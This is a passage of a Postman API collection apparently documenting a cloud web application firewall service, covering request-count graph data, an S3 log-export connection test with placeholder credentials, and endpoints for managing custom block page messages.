\"end\": \"1660341508965\",\n        \"count\": 145,\n        \"graph\": [\n            {\n                \"id\": 1,\n                \"time\": 1660254600000,\n                \"data\": []\n            },\n            {\n                \"id\": 2,\n                \"time\": 1660255200000,\n                \"data\": []\n            },\n            {\n                \"id\": 3,\n                \"time\": 1660255800000,\n                \"data\": []\n            },\n            {\n                \"id\": 4,\n                \"time\": 1660256400000,\n                \"data\": []\n            },\n            {\n                \"id\": 5,\n                \"time\": 1660257000000,\n                \"data\": []\n            },\n            {\n                \"id\": 6,\n                \"time\": 1660257600000,\n                \"data\": []\n            },\n            {\n                \"id\": 7,\n                \"time\": 1660258200000,\n                \"data\": []\n            },\n            {\n                \"id\": 8,\n                \"time\": 1660258800000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 2\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 9,\n                \"time\": 1660259400000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 4\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 10,\n                \"time\": 1660260000000,\n                \"data\": []\n            },\n            {\n                \"id\": 11,\n                \"time\": 1660260600000,\n                \"data\": []\n            },\n            {\n                \"id\": 12,\n                \"time\": 1660261200000,\n                \"data\": []\n            },\n            {\n                \"id\": 13,\n                \"time\": 1660261800000,\n                \"data\": []\n            },\n            {\n                \"id\": 14,\n                \"time\": 1660262400000,\n                \"data\": []\n            },\n            {\n                \"id\": 15,\n                \"time\": 1660263000000,\n                \"data\": []\n            },\n            {\n                \"id\": 16,\n                \"time\": 1660263600000,\n                \"data\": []\n            },\n            {\n                \"id\": 17,\n                \"time\": 1660264200000,\n                \"data\": []\n            },\n            {\n                \"id\": 18,\n                \"time\": 1660264800000,\n                \"data\": []\n            },\n            {\n                \"id\": 19,\n                \"time\": 1660265400000,\n                \"data\": []\n            },\n            {\n                \"id\": 20,\n                \"time\": 1660266000000,\n                \"data\": []\n            },\n            {\n                \"id\": 21,\n                \"time\": 1660266600000,\n                \"data\": []\n            },\n            {\n                \"id\": 22,\n                \"time\": 1660267200000,\n                \"data\": []\n            },\n            {\n                \"id\": 23,\n                \"time\": 1660267800000,\n                \"data\": []\n            },\n            {\n                \"id\": 24,\n                \"time\": 1660268400000,\n                \"data\": []\n            },\n            {\n                \"id\": 25,\n                \"time\": 1660269000000,\n                \"data\": []\n            },\n            {\n                \"id\": 26,\n                \"time\": 1660269600000,\n                \"data\": []\n            },\n            {\n                \"id\": 27,\n                \"time\": 1660270200000,\n                \"data\": []\n            },\n            {\n                \"id\": 28,\n                \"time\": 1660270800000,\n                \"data\": []\n            },\n            {\n                \"id\": 29,\n                \"time\": 1660271400000,\n                \"data\": []\n            },\n            {\n                \"id\": 30,\n                \"time\": 1660272000000,\n                \"data\": []\n            },\n            {\n                \"id\": 31,\n                \"time\": 1660272600000,\n                \"data\": []\n            },\n            {\n                \"id\": 32,\n                \"time\": 1660273200000,\n                \"data\": []\n            },\n            {\n                \"id\": 33,\n                \"time\": 1660273800000,\n                \"data\": []\n            },\n            {\n                \"id\": 34,\n                \"time\": 1660274400000,\n                \"data\": []\n            },\n            {\n                \"id\": 35,\n                \"time\": 1660275000000,\n                \"data\": []\n            },\n            {\n                \"id\": 36,\n                \"time\": 1660275600000,\n                \"data\": []\n            },\n            {\n                \"id\": 37,\n                \"time\": 1660276200000,\n                \"data\": []\n            },\n            {\n                \"id\": 38,\n                \"time\": 1660276800000,\n                \"data\": []\n            },\n            {\n                \"id\": 39,\n                \"time\": 1660277400000,\n                \"data\": []\n            },\n            {\n                \"id\": 40,\n                \"time\": 1660278000000,\n                \"data\": []\n            },\n            {\n                \"id\": 41,\n                \"time\": 1660278600000,\n                \"data\": []\n            },\n            {\n                \"id\": 42,\n                \"time\": 1660279200000,\n                \"data\": []\n            },\n            {\n                \"id\": 43,\n                \"time\": 1660279800000,\n                \"data\": []\n            },\n            {\n                \"id\": 44,\n                \"time\": 1660280400000,\n                \"data\": []\n            },\n            {\n                \"id\": 45,\n                \"time\": 1660281000000,\n                \"data\": []\n            },\n            {\n                \"id\": 46,\n                \"time\": 1660281600000,\n                \"data\": []\n            },\n            {\n                \"id\": 47,\n                \"time\": 1660282200000,\n                \"data\": []\n            },\n            {\n                \"id\": 48,\n                \"time\": 1660282800000,\n                \"data\": []\n            },\n            {\n                \"id\": 49,\n                \"time\": 1660283400000,\n                \"data\": []\n            },\n            {\n                \"id\": 50,\n                \"time\": 1660284000000,\n                \"data\": []\n            },\n            {\n                \"id\": 51,\n                \"time\": 1660284600000,\n                \"data\": []\n            },\n            {\n                \"id\": 52,\n                \"time\": 1660285200000,\n                \"data\": []\n            },\n            {\n                \"id\": 53,\n                \"time\": 1660285800000,\n                \"data\": []\n            },\n            {\n                \"id\": 54,\n                \"time\": 1660286400000,\n                \"data\": []\n            },\n            {\n                \"id\": 55,\n                \"time\": 1660287000000,\n                \"data\": []\n            },\n            {\n                \"id\": 56,\n                \"time\": 1660287600000,\n                \"data\": []\n            },\n            {\n                \"id\": 57,\n                \"time\": 1660288200000,\n                \"data\": []\n            },\n            {\n                \"id\": 58,\n                \"time\": 1660288800000,\n                \"data\": []\n            },\n            {\n                \"id\": 59,\n                \"time\": 1660289400000,\n                \"data\": []\n            },\n            {\n                \"id\": 60,\n                \"time\": 1660290000000,\n                \"data\": []\n            },\n            {\n                \"id\": 61,\n                \"time\": 1660290600000,\n                \"data\": []\n            },\n            {\n                \"id\": 62,\n                \"time\": 1660291200000,\n                \"data\": []\n            },\n            {\n                \"id\": 63,\n                \"time\": 1660291800000,\n                \"data\": []\n            },\n            {\n                \"id\": 64,\n                \"time\": 1660292400000,\n                \"data\": []\n            },\n            {\n                \"id\": 65,\n                \"time\": 1660293000000,\n                \"data\": []\n            },\n            {\n                \"id\": 66,\n                \"time\": 1660293600000,\n                \"data\": []\n            },\n            {\n                \"id\": 67,\n                \"time\": 1660294200000,\n                \"data\": []\n            },\n            {\n                \"id\": 68,\n                \"time\": 1660294800000,\n                \"data\": []\n            },\n            {\n                \"id\": 69,\n                \"time\": 1660295400000,\n                \"data\": []\n            },\n            {\n                \"id\": 70,\n                \"time\": 1660296000000,\n                \"data\": []\n            },\n            {\n                \"id\": 71,\n                \"time\": 1660296600000,\n                \"data\": []\n            },\n            {\n                \"id\": 72,\n                \"time\": 1660297200000,\n                \"data\": []\n            },\n            {\n                \"id\": 73,\n                \"time\": 1660297800000,\n                \"data\": []\n            },\n            {\n                \"id\": 74,\n                \"time\": 1660298400000,\n                \"data\": []\n            },\n            {\n                \"id\": 75,\n                \"time\": 1660299000000,\n                \"data\": []\n            },\n            {\n                \"id\": 76,\n                \"time\": 1660299600000,\n                \"data\": []\n            },\n            {\n                \"id\": 77,\n                \"time\": 1660300200000,\n                \"data\": []\n            },\n            {\n                \"id\": 78,\n                \"time\": 1660300800000,\n                \"data\": []\n            },\n            {\n                \"id\": 79,\n                \"time\": 1660301400000,\n                \"data\": []\n            },\n            {\n                \"id\": 80,\n                \"time\": 1660302000000,\n                \"data\": []\n            },\n            {\n                \"id\": 81,\n                \"time\": 1660302600000,\n                \"data\": []\n            },\n            {\n                \"id\": 82,\n                \"time\": 1660303200000,\n                \"data\": []\n            },\n            {\n                \"id\": 83,\n                \"time\": 1660303800000,\n                \"data\": []\n            },\n            {\n                \"id\": 84,\n                \"time\": 1660304400000,\n                \"data\": []\n            },\n            {\n                \"id\": 85,\n                \"time\": 1660305000000,\n                \"data\": []\n            },\n            {\n                \"id\": 86,\n                \"time\": 1660305600000,\n                \"data\": []\n            },\n            {\n                \"id\": 87,\n                \"time\": 1660306200000,\n                \"data\": []\n            },\n            {\n                \"id\": 88,\n                \"time\": 1660306800000,\n                \"data\": []\n            },\n            {\n                \"id\": 89,\n                \"time\": 1660307400000,\n                \"data\": []\n            },\n            {\n                \"id\": 90,\n                \"time\": 1660308000000,\n                \"data\": []\n            },\n            {\n                \"id\": 91,\n                \"time\": 1660308600000,\n                \"data\": []\n            },\n            {\n                \"id\": 92,\n                \"time\": 1660309200000,\n                \"data\": []\n            },\n            {\n                \"id\": 93,\n                \"time\": 1660309800000,\n                \"data\": []\n            },\n            {\n                \"id\": 94,\n                \"time\": 1660310400000,\n                \"data\": []\n            },\n            {\n                \"id\": 95,\n                \"time\": 1660311000000,\n                \"data\": []\n            },\n            {\n                \"id\": 96,\n                \"time\": 1660311600000,\n                \"data\": []\n            },\n            {\n                \"id\": 97,\n                \"time\": 1660312200000,\n                \"data\": []\n            },\n            {\n                \"id\": 98,\n                \"time\": 1660312800000,\n                \"data\": []\n            },\n            {\n                \"id\": 99,\n                \"time\": 1660313400000,\n                \"data\": []\n            },\n            {\n                \"id\": 100,\n                \"time\": 1660314000000,\n                \"data\": []\n            },\n            {\n                \"id\": 101,\n                \"time\": 1660314600000,\n                \"data\": []\n            },\n            {\n                \"id\": 102,\n                \"time\": 1660315200000,\n                \"data\": []\n            },\n            {\n                \"id\": 103,\n                \"time\": 1660315800000,\n                \"data\": []\n            },\n            {\n                \"id\": 104,\n                \"time\": 1660316400000,\n                \"data\": []\n            },\n            {\n                \"id\": 105,\n                \"time\": 1660317000000,\n                \"data\": []\n            },\n            {\n                \"id\": 106,\n                \"time\": 1660317600000,\n                \"data\": []\n            },\n            {\n                \"id\": 107,\n                \"time\": 1660318200000,\n                \"data\": []\n            },\n            {\n                \"id\": 108,\n                \"time\": 1660318800000,\n                \"data\": []\n            },\n            {\n                \"id\": 109,\n                \"time\": 1660319400000,\n                \"data\": []\n            },\n            {\n                \"id\": 110,\n                \"time\": 1660320000000,\n                \"data\": []\n            },\n            {\n                \"id\": 111,\n                \"time\": 1660320600000,\n                \"data\": []\n            },\n            {\n                \"id\": 112,\n                \"time\": 1660321200000,\n                \"data\": []\n            },\n            {\n                \"id\": 113,\n                \"time\": 1660321800000,\n                \"data\": []\n            },\n            {\n                \"id\": 114,\n                \"time\": 1660322400000,\n                \"data\": []\n            },\n            {\n                \"id\": 115,\n                \"time\": 1660323000000,\n                \"data\": []\n            },\n            {\n                \"id\": 116,\n                \"time\": 1660323600000,\n                \"data\": []\n            },\n            {\n                \"id\": 117,\n                \"time\": 1660324200000,\n                \"data\": []\n            },\n            {\n                \"id\": 118,\n                \"time\": 1660324800000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 1\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 119,\n                \"time\": 1660325400000,\n                \"data\": []\n            },\n            {\n                \"id\": 120,\n                \"time\": 1660326000000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 3\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 121,\n                \"time\": 1660326600000,\n                \"data\": []\n            },\n            {\n                \"id\": 122,\n                \"time\": 1660327200000,\n                \"data\": []\n            },\n            {\n                \"id\": 123,\n                \"time\": 1660327800000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 4\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 124,\n                \"time\": 1660328400000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 12\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 125,\n                \"time\": 1660329000000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 13\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 126,\n                \"time\": 1660329600000,\n                \"data\": []\n            },\n            {\n                \"id\": 127,\n                \"time\": 1660330200000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 1\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 128,\n                \"time\": 1660330800000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 11\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 129,\n                \"time\": 1660331400000,\n                \"data\": []\n            },\n            {\n                \"id\": 130,\n                \"time\": 1660332000000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 1\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 131,\n                \"time\": 1660332600000,\n                \"data\": []\n            },\n            {\n                \"id\": 132,\n                \"time\": 1660333200000,\n                \"data\": []\n            },\n            {\n                \"id\": 133,\n                \"time\": 1660333800000,\n                \"data\": []\n            },\n            {\n                \"id\": 134,\n                \"time\": 1660334400000,\n                \"data\": []\n            },\n            {\n                \"id\": 135,\n                \"time\": 1660335000000,\n                \"data\": []\n            },\n            {\n                \"id\": 136,\n                \"time\": 1660335600000,\n                \"data\": []\n            },\n            {\n                \"id\": 137,\n                \"time\": 1660336200000,\n                \"data\": []\n            },\n            {\n                \"id\": 138,\n                \"time\": 1660336800000,\n                \"data\": []\n            },\n            {\n                \"id\": 139,\n                \"time\": 1660337400000,\n                \"data\": []\n            },\n            {\n                \"id\": 140,\n                \"time\": 1660338000000,\n                \"data\": []\n            },\n            {\n                \"id\": 141,\n                \"time\": 1660338600000,\n                \"data\": []\n            },\n            {\n                \"id\": 142,\n                \"time\": 1660339200000,\n                \"data\": []\n            },\n            {\n                \"id\": 143,\n                \"time\": 1660339800000,\n                \"data\": []\n            },\n            {\n                \"id\": 144,\n                \"time\": 1660340400000,\n                \"data\": []\n            },\n            {\n                \"id\": 145,\n                \"time\": 1660341000000,\n                \"data\": []\n            }\n        ]\n    }\n}"}],"_postman_id":"468270e9-76f2-4b3a-a3b4-08916eaf8c9e"},{"name":"Test User S3 Export Log Copy","id":"27ffcea4-34ab-4dfa-b58f-f24e26f9188a","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":"{\r\n    \"server_type\": \"S3\",\r\n    \"user_bucket_name\": \"example-function\",\r\n    \"user_access_id\": \"xxx\",\r\n    \"user_secret_key\": \"xxx\",\r\n    \"user_account_region\": \"us-west-2\"\r\n}","options":{"raw":{"language":"json"}}},"url":"https://api.fortiweb-cloud.com/v1/application/:ep_id/log-settings/serverconnecttest","urlObject":{"protocol":"https","path":["v1","application",":ep_id","log-settings","serverconnecttest"],"host":["api","fortiweb-cloud","com"],"query":[],"variable":[{"id":"b0734cbc-ef9b-4960-b8b6-94fb87f5b185","type":"any","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"6c67311c-a88d-4cb8-9433-78514c9dbd73","name":"Success","originalRequest":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\r\n    \"server_type\": \"S3\",\r\n    \"user_bucket_name\": \"example-function\",\r\n    \"user_access_id\": \"xxx\",\r\n    \"user_secret_key\": \"xxx\",\r\n    \"user_account_region\": \"us-west-2\"\r\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.fortiweb-cloud.com/v1/application/:ep_id/log-settings/serverconnecttest","protocol":"https","host":["api","fortiweb-cloud","com"],"path":["v1","application",":ep_id","log-settings","serverconnecttest"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Connect the Cloud Connector successfully.\"\n}"},{"id":"08994309-8e3d-47fc-84e4-fb8c23df5234","name":"Failed due to  incorrectlocation","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\r\n    \"server_type\": \"S3\",\r\n    \"user_bucket_name\": \"example-function\",\r\n    \"user_access_id\": \"xxx\",\r\n    \"user_secret_key\": \"xxx\",\r\n    \"user_account_region\": \"us-west-2\"\r\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.fortiweb-cloud.com/v1/application/:ep_id/log-settings/serverconnecttest","protocol":"https","host":["api","fortiweb-cloud","com"],"path":["v1","application",":ep_id","log-settings","serverconnecttest"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"code":400,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"The bucket region is not matched with input. This bucket is in us-west-2. But the location from input is in us-east-1\"\n}"},{"id":"adc360e1-2933-4001-98d6-0ec1c8c28f61","name":"Failed due to unable find the bucket","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\r\n    \"server_type\": \"S3\",\r\n    \"user_bucket_name\": \"example-function\",\r\n    \"user_access_id\": \"xxx\",\r\n    \"user_secret_key\": \"xxx\",\r\n    \"user_account_region\": \"us-west-2\"\r\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.fortiweb-cloud.com/v1/application/:ep_id/log-settings/serverconnecttest","protocol":"https","host":["api","fortiweb-cloud","com"],"path":["v1","application",":ep_id","log-settings","serverconnecttest"],"variable":[{"key":"ep_id","value":null}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Unable to connect S3 bucket. Please check whether your bucket, secret key, access key are correct.\"\n}"}],"_postman_id":"27ffcea4-34ab-4dfa-b58f-f24e26f9188a"}],"id":"e42b2da5-1f77-4c2e-9cf2-da9f98838870","description":"<p>This section shows how to configure each application.</p>\n","event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"12aabaa1-152f-4d7e-803c-4d868c6426c7"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"e0a023a3-0620-4a5d-8c51-b091524b1e71"}}],"_postman_id":"e42b2da5-1f77-4c2e-9cf2-da9f98838870"},{"name":"Global Setting","item":[{"name":"Custom Block Page","item":[{"name":"Get Custom Block Messages list","id":"9eea236c-4fa3-42e8-ad56-57d1f5d5fdd7","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/custom-block-page/messages","description":"<p>Get the list for custom block page messages. Each user can create 8 custom messages at most.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","custom-block-page","messages"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"01e41625-8b41-4798-ba9a-9c3e8584b2f3","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":"https://api.tim.waasonline.com/v1/custom-block-page/messages"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 08:21:18 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"417"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"b8ae2dfa-86a1-11e9-9dc2-c195e9856560"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"avt_VHGLoAMFrzg="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf629fb-a24c19a6c1f619222a3e76b4;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"data\": [\n        {\n            \"name\": \"Predefined\",\n            \"description\": \"Predefined message\",\n            \"type\": \"Predefined\"\n        },\n        {\n            \"name\": \"new_page\",\n            \"description\": \"for test\",\n            \"type\": \"Custom\"\n        },\n        {\n            \"name\": \"messag_name\",\n            \"description\": \"for demo\",\n            \"type\": \"Custom\"\n        },\n        {\n            \"name\": \"message_name_2\",\n            \"description\": \"for test\",\n            \"type\": \"Custom\"\n        }\n    ],\n    \"total\": 4,\n    \"user_perm\": \"rw\"\n}"},{"id":"f7b95d44-c3e8-43de-9680-91dd32d6c480","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":"https://api.tim.waasonline.com/v1/custom-block-page/messages"},"status":"Unauthorized","code":401,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 08:34:47 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"34"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"9cc9e8b8-86a3-11e9-9c56-5df7ca7fdfd7"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"UnauthorizedException"},{"key":"x-amz-apigw-id","value":"avv-PF-5IAMF40A="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"}],"_postman_id":"9eea236c-4fa3-42e8-ad56-57d1f5d5fdd7"},{"name":"Get Custom Block Message Detail","id":"683f9745-764b-4e3a-bf39-e4ec1c3e8d94","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/custom-block-page/messages/:message-name","description":"<p>Get the detailed information of Custom Block Page Message. Response will include HTML content.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","custom-block-page","messages",":message-name"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"type":"string","value":"","key":"message-name"}]}},"response":[{"id":"7cfcddc5-d0e5-4354-b535-0821f4c0ba9e","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/custom-block-page/messages/:message-name","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","custom-block-page","messages",":message-name"],"variable":[{"key":"message-name","value":""}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 08:21:18 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"417"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"b8ae2dfa-86a1-11e9-9dc2-c195e9856560"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"avt_VHGLoAMFrzg="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf629fb-a24c19a6c1f619222a3e76b4;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"name\": \"new_page\",\n    \"description\": \"for test\",\n    \"type\": \"Custom\",\n    \"content\": [\n        {\n            \"msg\": \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HT><body>...</body></html>\",\n            \"name\": \"Attack Block Page\",\n            \"description\": \"Replacement HTML for Attack Block Page\",\n            \"id\": \"url-block\",\n            \"group\": \"Security\",\n            \"http_response_code\": 500\n        },\n        {\n            \"msg\": \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HT><body>...</body></html>\",\n            \"name\": \"Server Unavailable Page\",\n            \"description\": \"Replacement HTML for Server Unavailable Page\",\n            \"id\": \"server-inaccessible\",\n            \"group\": \"Security\",\n            \"http_response_code\": 503\n        },\n        {\n            \"msg\": \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HT><body>...</body></html>\",\n            \"name\": \"Captcha Enforcement Page\",\n            \"description\": \"Replacement HTML for Captcha Enforcement Page\",\n            \"id\": \"captcha-page\",\n            \"group\": \"Captcha\",\n            \"http_response_code\": 200\n        },\n        {\n            \"msg\": \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HT><body>...</body></html>\",\n            \"name\": \"Captcha Block Page\",\n            \"description\": \"Replacement HTML for Captcha Block Page\",\n            \"id\": \"captcha-block\",\n            \"group\": \"Captcha\",\n            \"http_response_code\": 200\n        }\n    ]\n}"},{"id":"7ff0465c-892a-428b-bea1-9e7bfb29dd90","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":{"raw":"https://api.tim.waasonline.com/v1/custom-block-page/messages/:message-name","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","custom-block-page","messages",":message-name"],"variable":[{"key":"message-name","value":""}]}},"status":"Unauthorized","code":401,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 08:34:47 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"34"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"9cc9e8b8-86a3-11e9-9c56-5df7ca7fdfd7"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"UnauthorizedException"},{"key":"x-amz-apigw-id","value":"avv-PF-5IAMF40A="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"}],"_postman_id":"683f9745-764b-4e3a-bf39-e4ec1c3e8d94"},{"name":"Create Custom Block Message","id":"c20df39f-8591-488c-bb7f-0e777d99a4c9","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\r\n    \"name\": \"new_page\",\r\n    \"description\": \"for test\",\r\n    \"type\": \"Custom\",\r\n    \"content\": [\r\n        {\r\n            \"msg\": \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HT><body>...</body></html>\",\r\n            \"name\": \"Attack Block Page\",\r\n            \"description\": \"Replacement HTML for Attack Block Page\",\r\n            \"id\": \"url-block\",\r\n            \"group\": \"Security\",\r\n            \"http_response_code\": 500\r\n        },\r\n        {\r\n            \"msg\": \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HT><body>...</body></html>\",\r\n            \"name\": \"Server Unavailable Page\",\r\n            \"description\": \"Replacement HTML for Server Unavailable Page\",\r\n            \"id\": \"server-inaccessible\",\r\n            \"group\": \"Security\",\r\n            \"http_response_code\": 503\r\n        },\r\n        {\r\n            \"msg\": \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HT><body>...</body></html>\",\r\n            \"name\": \"Captcha Enforcement Page\",\r\n            \"description\": \"Replacement HTML for Captcha Enforcement Page\",\r\n            \"id\": \"captcha-page\",\r\n            \"group\": \"Captcha\",\r\n            \"http_response_code\": 200\r\n        },\r\n        {\r\n            \"msg\": \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HT><body>...</body></html>\",\r\n            \"name\": \"Captcha Block Page\",\r\n            \"description\": \"Replacement HTML for Captcha Block Page\",\r\n            \"id\": \"captcha-block\",\r\n            \"group\": \"Captcha\",\r\n            \"http_response_code\": 200\r\n        }\r\n    ]\r\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/custom-block-page/messages","description":"<p>Create a Custom Block Page Message.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"properties\": {\n        \"name\": {\n            \"description\": \"The unique name of the Custom Block Message, with number, letter or underscore. Required. Maximum length is 30.\",\n            \"type\": \"string\"\n        },\n        \"description\": {\n            \"description\": \"The description of Custom Block Message. optional.\",\n            \"type\": \"string\"\n        },\n        \"content\": {\n            \"description\": \"The type of the Cloud Connector, required.\",\n            \"type\": \"array\",\n            \"properties\": {\n                \"name\": {\n                    \"description\": \"name of page, required.\",\n                    \"type\": \"string\",\n                    \"enum\": [\"Attack Block Page\", \"Server Unavailable Page\", \"Captcha Enforcement Page\", \"Captcha Block Page\"]\n                },\n                \"id\": {\n                    \"description\": \"Identity of message, required. \",\n                    \"type\": \"string\",\n                    \"enum\": [\"url-block\", \"server-inaccessible\", \"captcha-page\", \"captcha-block\"]\n                },\n                \"group\": {\n                    \"description\": \"Group name. required.\",\n                    \"type\": \"string\",\n                    \"enum\": [\"Security\", \"Captcha\"]\n                },\n                \"http_response_code\": {\n                    \"description\": \"Response code\",\n                    \"type\": \"number\"\n                },\n                \"description\": {\n                    \"description\": \"optional\",\n                    \"type\": \"string\"\n                },\n                \"msg\": {\n                    \"description\": \"Content of message detail, in HTML format. required.\",\n                    \"type\": \"string\",\n                }\n            }\n        }\n    }\n}\n</code></pre>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","custom-block-page","messages"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"751726e4-e81a-4fe3-8d76-c180ef6fe0df","name":"Success","originalRequest":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\n    \"name\": \"new_page_name\",\n    \"description\": \"for test\",\n    \"type\": \"Custom\",\n    \"content\": [\n        {\n            \"msg\": \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HT><body>...</body></html>\",\n            \"name\": \"Attack Block Page\",\n            \"description\": \"Replacement HTML for Attack Block Page\",\n            \"id\": \"url-block\",\n            \"group\": \"Security\",\n            \"http_response_code\": 500\n        },\n        {\n            \"msg\": \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HT><body>...</body></html>\",\n            \"name\": \"Server Unavailable Page\",\n            \"description\": \"Replacement HTML for Server Unavailable Page\",\n            \"id\": 